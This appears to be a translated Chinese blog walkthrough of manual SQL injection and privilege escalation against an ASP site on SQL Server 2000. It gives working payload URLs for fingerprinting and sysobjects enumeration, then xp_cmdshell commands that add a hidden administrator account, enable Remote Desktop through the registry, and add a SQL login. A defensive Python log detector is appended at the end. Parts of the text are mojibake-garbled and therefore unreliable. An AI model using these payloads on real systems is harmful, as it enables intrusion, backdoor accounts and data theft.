MSSQL Manual Injection and Privilege Escalation

Content published/updated: 2026/2/25 20:31:49, Monday

×÷Õߣºº£Ä¬

Blog£ºhttp://hi.http://www.35331.cn//chjxhyy/

Ä¿±êÕ¾£ºhttp://www.xxoo.net

ÔÚÊ×Ò³Ëæ±ãµã¼¸¸öÁ´½Ó£¬¼Ó¡¯ ²âÊÔÊÇ·ñ´æÔÚ×¢Èë ÔÚ¸ÃÁ´½Óϱ¨´íÁË¡£¡£

[Microsoft][ODBC SQL Server Driver][SQL Server]字符串 '237' order by pu_id asc' 之前有未闭合的引号。
(In English: Unclosed quotation mark before the character string '237' order by pu_id asc'.)

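http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237' (the URL is heavily masked so that it cannot be found through a search engine)

The parameter is a string type. The field is followed by an order by clause, which can simply be commented out with --.

http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237' and 1=1-- returns normally
http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237' and 1=2-- returns an error

The injection is confirmed. The habitual next step is to enumerate the tables and columns, but first check some basic information: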

Check the MSSQL database version

http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237' and 0<>(select @@version)--

It is SQL Server 2000.

Check the current database

http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237' and db_name()>0--

The user of the current database

http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237' and user>0--

Whether multi-statement (stacked) queries are supported

http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237' ;declare @a int--

They are.

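Before enumerating the tables, it is better to find the admin directory first; otherwise the account and password would be wasted if the back end cannot be found. Appending admin to the URL shows that directory listing is forbidden,

and several common names appended after it (login.asp, admin.asp and so on) were all wrong, so I scanned with wwwscan instead.

It turned out to be admin_main_asp. Visiting it gave a login timeout and then redirected to the system directory, so this is the one: http://www.xxoo.net/system

OK, now enumerate the tables. The first one:

http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237' and (select top 1 name from sysobjects where xtype='u')>0--

The second one:

http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237' and (select top 1 name from sysobjects where xtype='u' and name not in ('sdlabout'))>0--

Continuing in the same way yields the following tables: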

'zxkd','yjcx_qs','yjcx_md','yjcx','t_shop','t_publish','t_project','t_logins','t_functions','t_employee_functions','t_employee','sqyj','shopwin','sdlnews','sdlhome','sdl_member_old','sdl_member','SailingSchedule','sailingdata','SailingAdjustmentInformation','RulesOperating','pu_cp','person','OperationalInformation','online_ly','oldSailingSchedule1','oldRulesOperating1','oldnewyunjia1','newyunjia','new_sailingdate','kouan','katj','IndustryNews','hxjx','FeeAdjustmentInformation','execlname','exceldata','dtxx','dtproperties','dcnews','dcmember','dc_sft','dc_sf','dc_jbxx','dc_hy','dc_hw','dc_gk','dc_gg_hw','dc_gg','sdlabout','AgentNetwork','aucclass','cusinfo'

Damn, that is quite a lot, and exhausting. Which one is the admin table? t_logins looks the most likely, so that is the one.

±¬×ֶΣ¡

http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237' col_name(object_id('t_logins'),1) from sysobjects)>0--

and (select top 1

È»ºóÒÀ´Î±¬³ö£ºlogin_name login_password

ÐÄÀﻹͦ¸ßÐË£¬½á¹û¾Í±¯¾çÁË£¬±¬ÄÚÈݵÄʱºò¾ÓȻʲô¶¼Ã»ÓУ¬¿Õ±í£¿£¡

http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237' and (select top 1 login_name from [t_logins])>0--

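Looking at the tables above, only t_logins seemed relevant, and I could not be bothered to try the others. Time to think of another approach.

I first thought of getting a shell through a database backup, because the user shown earlier was dbo, but the problem is that the path is unknown.

Going through my collected SQL statements, I saw this one: and 1=(select is_srvrolemember('sysadmin'))-- which tests whether the database user has relatively high privileges.

http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237' and 1=(select is_srvrolemember('sysadmin'))--

sa privileges!!

Then I tried one more: and 1=(select IS_SRVROLEMEMBER('sysadmin'))-- It really is sa privileges. Why on earth did I not try this earlier?

With sa, things are much easier.

First, check for the xp_cmdshell stored procedure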

http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237' and 1=(select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell')--

Ha, it exists. Add a user directly.

http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237';exec master..xp_cmdshell 'net user hmhk$ haimohk /add'--

At this point another error appeared:

无法装载 DLL x 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)
(In English: Cannot load the DLL x, or one of the DLLs it references. Reason: 126 (The specified module could not be found.))

I searched on Baidu, and it is said to be caused by the SA password of SQL2000 being too simple.

http://hi.http://www.35331.cn//mlm_mlm/blog/item/30eb9422672d84e6d7cae296.html

Following that method solved the problem, so I continued adding the user:

http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237';exec master..xp_cmdshell 'net user hmhk$ haimohk /add'--

http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237';exec master..xp_cmdshell 'net localgroup administrators hmhk$ /add'

But an error appeared, so I do not know whether the user was added.

Try logging in with mstsc.

Now what is to be done?

Perhaps it is not enabled, or the port has been changed.

Run a command to enable 3389:

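http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237';exec master..xp_cmdshell 'REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\ /v \fDenyTSConnections /t REG_DWORD /d 0 /f'

Connecting again gave the same result. Reading the port was no use either, because no output is echoed back. Stuck again.

After thinking for a while, it suddenly occurred to me that I could add a database user with sa privileges and then connect with sqlTools, which would again allow a lot to be done.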

http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237' exec master.dbo.sp_addlogin adm1n,haimohk
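
Seen from the defender's side, the requests in this walkthrough leave a recognisable sequence in the web server log: quote probe, fingerprinting, sysobjects enumeration, sysadmin role check, then stacked exec calls. The following Python detector is an added example, not part of the original article; the log lines are constructed, and the stage names, the rule set and the W3C-style field order are assumptions of this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Stage rules in the order the walkthrough moves through them (assumed rule set).
RULES = [
    ("probe", re.compile(r"'\s*(and|or)\s+\d+\s*(=|<>)\s*\d+")),
    ("fingerprint", re.compile(r"@@version|db_name\s*\(|\buser\s*>\s*0")),
    ("enumerate", re.compile(r"\bsysobjects\b|col_name\s*\(|object_id\s*\(")),
    ("privcheck", re.compile(r"is_srvrolemember\s*\(")),
    ("execute", re.compile(r";\s*exec\b.*\b(xp_cmdshell|sp_addlogin)\b")),
]

def classify(query):
    """URL-decode, lowercase and squeeze whitespace; return names of all matching stages."""
    text = re.sub(r"\s+", " ", unquote_plus(query).lower())
    return [stage for stage, rule in RULES if rule.search(text)]

def scan(lines):
    """Map each client IP to the distinct stages seen, in first-seen order."""
    seen = defaultdict(list)
    for line in lines:
        parts = line.split()
        if line.startswith("#") or len(parts) < 7:
            continue  # skip W3C header lines and short or malformed records
        ip, query = parts[2], parts[5]
        for stage in classify(query):
            if stage not in seen[ip]:
                seen[ip].append(stage)
    return dict(seen)

def escalated(report):
    """IPs whose requests reached a role check or a stacked exec call."""
    return sorted(ip for ip, s in report.items() if {"privcheck", "execute"} & set(s))

# Constructed log lines (fields: date time c-ip method uri-stem uri-query status).
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2024-01-01 10:00:01 203.0.113.7 GET /directory/xxoo.ASP xx_ID=237 200",
    "2024-01-01 10:00:05 203.0.113.7 GET /directory/xxoo.ASP xx_ID=237'+and+1=1-- 200",
    "2024-01-01 10:00:09 203.0.113.7 GET /directory/xxoo.ASP xx_ID=237'%20and%20db_name()>0-- 500",
    "2024-01-01 10:01:30 203.0.113.7 GET /directory/xxoo.ASP xx_ID=237'+and+(select+top+1+name+from+sysobjects+where+xtype='u')>0-- 500",
    "2024-01-01 10:05:12 203.0.113.7 GET /directory/xxoo.ASP xx_ID=237'+and+1=(select+IS_SRVROLEMEMBER('sysadmin'))-- 200",
    "2024-01-01 10:06:40 203.0.113.7 GET /directory/xxoo.ASP xx_ID=237';exec+master..xp_cmdshell+'placeholder'-- 500",
    "2024-01-01 10:07:00 198.51.100.9 GET /directory/xxoo.ASP xx_ID=12&sort=user 200",
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A client that reaches the privcheck or execute stage is a prompt to review which server roles the web application's database login holds and whether xp_cmdshell is reachable from it.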